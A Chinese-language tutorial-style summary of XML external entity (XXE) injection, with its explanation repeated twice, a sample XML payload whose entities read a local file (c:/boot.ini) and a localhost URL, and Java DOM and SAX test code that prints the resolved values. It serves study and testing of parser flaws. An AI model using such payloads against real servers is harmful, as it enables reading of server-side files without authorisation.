Xml实体注入漏洞的一些总结
1、 xml实体注入原理
&xxx;表示xxx是xml的一个实体,其值为xml内部定义,文件中&arno;和&boot;是实体,并且DTD定义实体内容来自于外部文件和URL网络资源,在解析到时候解析器一般会读取其真实值显示。类似于&,<>等都需要进行转义, 即转义为空格,< 转义为<, >转义为>。
除了俗成约定之外的实体,其他实体需要在xmlDTD申明中指明实体,否则将出现错误,另外xml 规范 DTD可以在xml内部定义,也可以在xml外部引入。
Xml实体 可以指定为外部http文件,也可以指定为内部文件系统,当指定为本地文件的时候,则出现了xml实体注入漏洞。
2、 漏洞的一般利用
上传或者控制一个xml文件,让服务器端去解析该文件,既可以读取服务器端文件内容。
3、 进一步测试:
1、 xml实体注入原理
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!--define DTD -->
<!--
引入外部DTD,也可以包含文件,不过并不能读取全部信息
<!DOCTYPE movies SYSTEM "file:///c:/boot.ini">
-->
<!--内部DTD申明-->
<!DOCTYPE root[
<!ENTITY arno SYSTEM "http://127.0.0.1/xml/read.txt">
<!ENTITY boot SYSTEM "file:///c:/boot.ini">
<!ELEMENT hackers (#PCDATA)>
]>
<root>
<hackers>
&arno; is readed from read.txt
&boot; is readed from file
</hackers>
</root>
&xxx;表示xxx是xml的一个实体,其值为xml内部定义,文件中&arno;和&boot;是实体,并且DTD定义实体内容来自于外部文件和URL网络资源,在解析到时候解析器一般会读取其真实值显示。类似于&,<>等都需要进行转义, 即转义为空格,< 转义为<, >转义为>。
除了俗成约定之外的实体,其他实体需要在xmlDTD申明中指明实体,否则将出现错误,另外xml 规范 DTD可以在xml内部定义,也可以在xml外部引入。
Xml实体 可以指定为外部http文件,也可以指定为内部文件系统,当指定为本地文件的时候,则出现了xml实体注入漏洞。
2、 漏洞的一般利用
上传或者控制一个xml文件,让服务器端去解析该文件,既可以读取服务器端文件内容。
3、 进一步测试:
Php语言大牛已经说过了,simplexml_load_file的xml文件读取组件存在该漏洞,其他语言JAVA(DOM、SAX读取xml文件)、ASP我测试过依然存在该漏洞,但是在测试JAVA的时候,如果引入的外部内容中含有xml特殊字符,则会出现解析错误,不一定能正确读取到服务端文件。
一些相应测试代码:
try{
File f=new File("C:\\xampp\\htdocs\\xml\\text.xml");
DocumentBuilderFactory factory=DocumentBuilderFactory.newInstance();
DocumentBuilder builder=factory.newDocumentBuilder();
Document doc = builder.parse(f);
NodeList nl = doc.getElementsByTagName("hackers");
for (int i=0;i < nl.getLength() ;i++){
System.out.print("value:" + nl.item(i).getFirstChild().getNodeValue());
}
}catch(Exception e){
e.printStackTrace();
}
public class SaxXmlReader extends DefaultHandler {
java.util.Stack tags = new java.util.Stack();
public SaxXmlReader() {
super();
}
public static void main(String args[]) {
long lasting = System.currentTimeMillis();
try {
SAXParserFactory sf = SAXParserFactory.newInstance();
SAXParser sp = sf.newSAXParser();
SaxXmlReader reader = new SaxXmlReader();
sp.parse(new InputSource("C:\\xampp\\htdocs\\xml\\text.xml"), reader);
} catch (Exception e) {
e.printStackTrace();
}
System.out.println("运行时间:" + (System.currentTimeMillis() - lasting) + " 毫秒");
}
public void characters(char ch[], int start, int length) throws SAXException {
String tag = (String) tags.peek();
if (tag.equals("hackers")) {
System.out.print("Value:" + new String(ch, start, length));
}
}
public void startElement(
String uri,
String localName,
String qName,
Attributes attrs) {
tags.push(qName);
}
}